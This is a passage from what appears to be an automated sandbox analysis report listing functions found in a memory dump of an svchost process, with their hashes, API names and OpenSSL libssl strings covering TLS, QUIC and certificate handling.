                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$1RTT$<zero length id>$<zero length token>
                                                                                              • API String ID: 4098839300-1594244681
                                                                                              • Opcode ID: 264e043a6882cd5bd435734d9db1f545b700eb8236dd76e3680822af3bab3e74
                                                                                              • Instruction ID: 090d86098351f727be5b28288442b31652c045ce40bdb0c6b6308c21b5052d61
                                                                                              • Opcode Fuzzy Hash: 264e043a6882cd5bd435734d9db1f545b700eb8236dd76e3680822af3bab3e74
                                                                                              • Instruction Fuzzy Hash: 06415CD0E4EA4290FE26DB75E8911FC2B619F457C4F449036DE2E172BADE3CE40A9300
                                                                                              Function 00007FFBAB466481 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Handshake
                                                                                              • API String ID: 4098839300-3950675722
                                                                                              • Opcode ID: c59a1bdaf8b58626ab22597feafb7eb337a94abe441109457761569a3fe6783f
                                                                                              • Instruction ID: 92e47d35aa60e2d04c814100339cd6f66534558a4eb7d9120d68be04c847ab71
                                                                                              • Opcode Fuzzy Hash: c59a1bdaf8b58626ab22597feafb7eb337a94abe441109457761569a3fe6783f
                                                                                              • Instruction Fuzzy Hash: F8415CD0E4EA4290FE26DB75E8911FC2B619F457C4F449036DE2E172BADE3CE40A9300
                                                                                              Function 00007FFBAB46648A Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Retry
                                                                                              • API String ID: 4098839300-2815561440
                                                                                              • Opcode ID: 67fb42c6d8a87e11502fd2278393b3d52b4fd394e71b3f26912515776d325309
                                                                                              • Instruction ID: a973cbcde6ad9e14011b2155313ed20629bedc27c6ef62ed8f059afdba6fd4c4
                                                                                              • Opcode Fuzzy Hash: 67fb42c6d8a87e11502fd2278393b3d52b4fd394e71b3f26912515776d325309
                                                                                              • Instruction Fuzzy Hash: 30415CD0E4EA4294FE26DB75E8911FC2B619F457C4F449136DE2E172BADE3CE40A9300
                                                                                              Function 00007FFBAB43E990 Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts
                                                                                              • String ID: Illegal Alert Length$ Level=%s(%d), description=%s(%d)$ change_cipher_spec (1)$ Content Type = %s (%d) Length = %d$ Inner Content Type = %s (%d)$ epoch=%d, sequence_number=%04x%04x%04x$ TLS RecordHeader: Version = %s (0x%x)$ too short message$Message length parse error!$Received$Sent$UNKNOWN$unknown value
                                                                                              • API String ID: 3508759399-1353787293
                                                                                              • Opcode ID: c7a5dc54c00234d68f6c98cff7be6b630077e649b2aa6d96f11a4dc9702c593d
                                                                                              • Instruction ID: 72cd49a9d8ee13b4c65310920921374192c1055638fa4c6e3fc834c8d91ac926
                                                                                              • Opcode Fuzzy Hash: c7a5dc54c00234d68f6c98cff7be6b630077e649b2aa6d96f11a4dc9702c593d
                                                                                              • Instruction Fuzzy Hash: 7491B4A2A4E68285EA769B35E45017E6BA1FF85784F4CC036DFAE037A1CE3CE505D710
                                                                                              Function 00007FFBAB474800 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • 666666666666666666666666666666666666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ssl3_set_crypto_state, xrefs: 00007FFBAB4748CF, 00007FFBAB4749AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$X_get0_cipher$Final_exX_copy_exX_freememcpy$D_get_sizeD_is_aO_get_typeR_get_modeX_new
                                                                                              • String ID: 666666666666666666666666666666666666666666666666\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ssl3_set_crypto_state
                                                                                              • API String ID: 2225050219-1517534223
                                                                                              • Opcode ID: a42fbf17189fd951b6ee509d1a25ded697f71a72bdef3f320c99e93f85a50791
                                                                                              • Instruction ID: cc05a773134263635e7a7cb1e5959e9377bb738021632962399c24de9701bf62
                                                                                              • Opcode Fuzzy Hash: a42fbf17189fd951b6ee509d1a25ded697f71a72bdef3f320c99e93f85a50791
                                                                                              • Instruction Fuzzy Hash: 5F71E891B4E78340EA26DB73E9512BE6790AF89BC4F049035ED6D477A6EE3CD048C705
                                                                                              Function 00007FFBAB493070 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$R_new$X_free$L_sk_numR_set_debug$L_sk_value$R_clear_errorX509_verify_certX_get0_chainX_initX_new_ex
                                                                                              • String ID: ssl\statem\statem_lib.c$ssl_add_cert_chain
                                                                                              • API String ID: 908776618-1864314606
                                                                                              • Opcode ID: 4ded3c45a9f5e313dfbd2a9052209eea991ca9083dc52cd3238337bb07a7fc01
                                                                                              • Instruction ID: 945b1267c1ae7c561eeadcbc8b2d35f084e576459967e51af3b29b4474e93ff0
                                                                                              • Opcode Fuzzy Hash: 4ded3c45a9f5e313dfbd2a9052209eea991ca9083dc52cd3238337bb07a7fc01
                                                                                              • Instruction Fuzzy Hash: 7D5194E1B4E28242FA72AA72D5C167D6641BF56FC0F04C435EE2D47BB6DE2CE4068306
                                                                                              Function 00007FFBAB43ABA0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 290COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_get_typeR_vset_error
                                                                                              • String ID: ssl\t1_lib.c$tls12_check_peer_sigalg
                                                                                              • API String ID: 812865484-3755023935
                                                                                              • Opcode ID: a359bb5175d06b9b752ac6819fca77620d0d96461235a11ce37690f78518dbc2
                                                                                              • Instruction ID: 443bbe0cf9849ece1fb7570eabe87b4daaf97ede3fad40a7b8c9837fccb5c52f
                                                                                              • Opcode Fuzzy Hash: a359bb5175d06b9b752ac6819fca77620d0d96461235a11ce37690f78518dbc2
                                                                                              • Instruction Fuzzy Hash: 28C1ACA2E8E68242FA679A36C4812BD3391EF40780F58C435DE6D876F1CE2CE9858741
                                                                                              Function 00007FFBAB416C60 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$Final_exInit_ex$L_cleanseR_newR_set_debugR_vset_errorX_freeX_new
                                                                                              • String ID: ssl3_generate_master_secret$ssl\s3_enc.c
                                                                                              • API String ID: 170064413-120754557
                                                                                              • Opcode ID: 81745e4446bca413cfe758efb30117ef0c65d56f48ccd6075b13ff87b4c99dbc
                                                                                              • Instruction ID: 5e1e2b2fcd8f785fb76d9d593696f720d4c4b3def63fa88f29d488c246d27b26
                                                                                              • Opcode Fuzzy Hash: 81745e4446bca413cfe758efb30117ef0c65d56f48ccd6075b13ff87b4c99dbc
                                                                                              • Instruction Fuzzy Hash: 8A5196A1F5E64251F622EB32E9527BE6350BF89BC4F409031EE6D47766DE3CE4448701
                                                                                              Function 00007FFBAB431BB0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_errorX509_free
                                                                                              • String ID: SSL_use_certificate_file$ssl\ssl_rsa.c
                                                                                              • API String ID: 2680622528-2821204180
                                                                                              • Opcode ID: 7d33748c947b86641809e4c51edeeb1ecffc982e89cdf14564a8fb8a613897b6
                                                                                              • Instruction ID: 9cac559ad99f7b5905af72ccdcb507135c00338bb3a4c8470e3bbfeadd111988
                                                                                              • Opcode Fuzzy Hash: 7d33748c947b86641809e4c51edeeb1ecffc982e89cdf14564a8fb8a613897b6
                                                                                              • Instruction Fuzzy Hash: A04153E2A0EA4281FA22EB72D8511FE2351AF85790F58C035ED3D476F6DE3CE54A9701
                                                                                              Function 00007FFBAB41BC60 Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$E_freeL_sk_set_cmp_funcM_read_bio_X509$E_dupL_sk_findL_sk_pushO_ctrlO_freeO_newO_s_fileR_clear_errorR_newR_set_debugR_set_errorX509_freeX509_get_subject_name
                                                                                              • String ID: SSL_add_file_cert_subjects_to_stack$ssl\ssl_cert.c
                                                                                              • API String ID: 2223916698-1814255512
                                                                                              • Opcode ID: c23894fe0d83960a1e2b92901666e6c3f27e1cf54e886353b832cd548e2c7f6e
                                                                                              • Instruction ID: ee760ec1825bfe2f9e6f8b6352e74d3b33dc7abbce2e7947c510028a9a064dd7
                                                                                              • Opcode Fuzzy Hash: c23894fe0d83960a1e2b92901666e6c3f27e1cf54e886353b832cd548e2c7f6e
                                                                                              • Instruction Fuzzy Hash: B3315E91F4F21281FA66AB32E8936BD5250AF85BC0F44C435ED2D47BA6EE2DE5098704
                                                                                              Function 00007FFBAB48C3C0 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 270COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_client_hello
                                                                                              • API String ID: 4275876640-3515996699
                                                                                              • Opcode ID: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                              • Instruction ID: 59658420a19a6bb96c6f345c1bdba5857eb9ad02b97bd9cedcafae3424634b11
                                                                                              • Opcode Fuzzy Hash: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                              • Instruction Fuzzy Hash: B6B181E2A0E69381FB629AB6D5413BD1690AF45FC4F08C032DE6D866E7DF3CE4458351
                                                                                              Function 00007FFBAB492AD0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OPENSSL_sk_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492AFC
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492B0B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492B23
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • d2i_X509_NAME.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492BD0
                                                                                              • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492BEE
                                                                                              • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492C0A
                                                                                              • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492CEA
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB47B80E), ref: 00007FFBAB492CF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_pop_freeX509_$E_freeL_sk_newL_sk_pushR_newR_set_debugR_vset_errord2i_
                                                                                              • String ID: parse_ca_names$ssl\statem\statem_lib.c
                                                                                              • API String ID: 1078948774-2141598178
                                                                                              • Opcode ID: c7b76cd4449573da7d42b1a079351f64b7b5a0f99ba7884a8bf6dd802beac5ab
                                                                                              • Instruction ID: 6b62f508b50267e2b72a3986592e5174ae5a48af216dead0ed6af2c7ea2713c4
                                                                                              • Opcode Fuzzy Hash: c7b76cd4449573da7d42b1a079351f64b7b5a0f99ba7884a8bf6dd802beac5ab
                                                                                              • Instruction Fuzzy Hash: 9C51B4A1F4E65281FA23AB72E8911BD6351EF84380F44C431EEBD42AB6DE2DE5858701
                                                                                              Function 00007FFBAB47ABF0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_poll$SSL_poll currently does not support polling sockets$SSL_poll currently only supports QUIC SSL objects$SSL_poll does not currently support blocking operation$SSL_poll does not support unknown poll descriptor type %d$ssl\rio\poll_immediate.c
                                                                                              • API String ID: 1552677711-1312627168
                                                                                              • Opcode ID: f04a2d450dba436fa6427ef25b33032bde060a6b61b459dd1f9ddc99022ccb72
                                                                                              • Instruction ID: b3dc8088cf21e4f88cc98c1855fb3c05213c8de82e809b44774cf000c10de6f5
                                                                                              • Opcode Fuzzy Hash: f04a2d450dba436fa6427ef25b33032bde060a6b61b459dd1f9ddc99022ccb72
                                                                                              • Instruction Fuzzy Hash: E271C0B1B4EB8296EA26DF35E4102B96395FB84B80F549431DEAE177B0CE3CE445C740
                                                                                              Function 00007FFBAB441C70 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_vset_error
                                                                                              • String ID: derive_secret_key_and_iv$key$ssl\tls13_enc.c$tls13_hkdf_expand
                                                                                              • API String ID: 773136946-1769045784
                                                                                              • Opcode ID: 0231e931ef7cdaa0a56683b6b8689033dbc63919f11125f5bd0f8acc5763542b
                                                                                              • Instruction ID: 1c076242ed411d58926a9e7b3889481541e9d637afab86df160bd68746a9388c
                                                                                              • Opcode Fuzzy Hash: 0231e931ef7cdaa0a56683b6b8689033dbc63919f11125f5bd0f8acc5763542b
                                                                                              • Instruction Fuzzy Hash: 1791607660AB8282EB61DB22E4917AE77A4FB88B80F108435DFAD43B65DF3CD555C700
                                                                                              Function 00007FFBAB422770 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: <EMPTY>$SSL_CONF_cmd$cmd=%s$cmd=%s, value=%s$ctrl_switch_option$ssl\ssl_conf.c
                                                                                              • API String ID: 1552677711-1544666551
                                                                                              • Opcode ID: 8394d6f49662b3752447eaa2c7e46edcf05cf4991946146562246dfa91965209
                                                                                              • Instruction ID: 46d03d556ef9c98c91a17178e3723bc21e21fb5e382edd74c3f7e9e4f041d7e5
                                                                                              • Opcode Fuzzy Hash: 8394d6f49662b3752447eaa2c7e46edcf05cf4991946146562246dfa91965209
                                                                                              • Instruction Fuzzy Hash: 9F6192A2B0A64282FB529B6AE4412F973A1EF84780F588436DE6C477F5DF3CD985C700
                                                                                              Function 00007FFBAB44EEDC Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 170COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_handle_packet$client received initial token$new packet with old keys$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-2370986996
                                                                                              • Opcode ID: 63c52f1f679ab2f8c704dffe7516243d4f98cfd88b06ed1081e41bf7ac340370
                                                                                              • Instruction ID: b1830102049fc844b03ca196ab29ce73f4661b77dce8245893987c3b16be9d96
                                                                                              • Opcode Fuzzy Hash: 63c52f1f679ab2f8c704dffe7516243d4f98cfd88b06ed1081e41bf7ac340370
                                                                                              • Instruction Fuzzy Hash: BB8179B1A0EB8186FB26DB70E5603BAB3A0EB45744F448435DFAE066A5DF3DE455C700
                                                                                              Function 00007FFBAB474B00 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
